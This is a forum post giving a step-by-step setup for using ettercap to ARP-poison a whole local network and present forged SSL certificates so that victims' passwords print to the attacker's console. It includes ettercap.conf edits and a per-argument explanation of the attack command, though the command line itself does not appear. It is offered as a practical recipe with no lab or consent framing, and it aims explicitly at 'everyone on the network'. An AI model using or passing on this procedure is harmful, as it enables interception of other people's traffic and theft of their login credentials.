If this is your first visit, be sure to
check out the Forum Rules by clicking the
link above. You may have to register
before you can post: click the register link above to proceed. To start viewing messages,
select the forum that you want to visit from the selection below.

For people with Ettercap/SSL trouble.

Hey everyone,

I spent a lot of time trying to get ettercap to sniff SSL passwords using ARP poisoning and sending a forged certificate to the victim machine. I saw a lot of posts very similar to my problem on here with out actually finding the solution so I'm posting what I figured out last night.

For me the problem was very simple. ettercap doesn't seem to do port forwarding for the machine that it is running on. Yes, that's what I messed up. I ran ettercap with all the proper arguments and then FTP'd to some place, and saw the password. "Great!" I thought, and then I tried GMail and it was silent, it didn't show anything. This is a sign of SSL not being forwarded or that you did edit /etc/ettercap.conf properly (see bellow).

I didn't realize that to test this I should grab another machine. I thought the machine I was on was fine. A lot of searching and asking in IRC and this didn't come up so I figured it should be posted to here.

Here's exactly what I did for your benefit:

Step 1) Edit /etc/ettercap.conf

Step 1a) Set the following lines to zero instead of 65536
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default

Note: You only have to perform step 1 once on a machine, then run the command whenever.

Explaination of arguments:
--text: puts ettercap in text-only, no interactive UI mode
--quiet: supresses output of all the packets being sniffed, limits output to only passwords
--iface eth1: This is the LAN interface you're using eth1 happens to be my wireless card.
--plugin autoadd: Very useful plugin. This will poison machines that connect after you have started the script. If you don't do this, you only poison the machines that are on when you begin, which might be noone.
--log-info mylog: Logs just connection details and passwords. See manpage if you want more logging. This will create a file called log.eci which can be read later with etterlog.
--mitm arp:remote: Tells ettercap to poison the ARP tables so that everyone on the network things that you're the gateway and all communication will go through you.
// //: These are two lists of IP, port ranges to sniff. Read the man page on this for more details. As I have set it up, it will poison and sniff everyone on the network.

Details of what will happen:
After you run the command, anyone on the network visiting an SSL page (that is anything with https rather than http) is going to see a new certificate and get an very non-subtle warning that there's possibly foul play afoot (assuming they have visited the site before and have a valid certificate stored already). If they accept the new certificate and log in, their password will be printed to your console.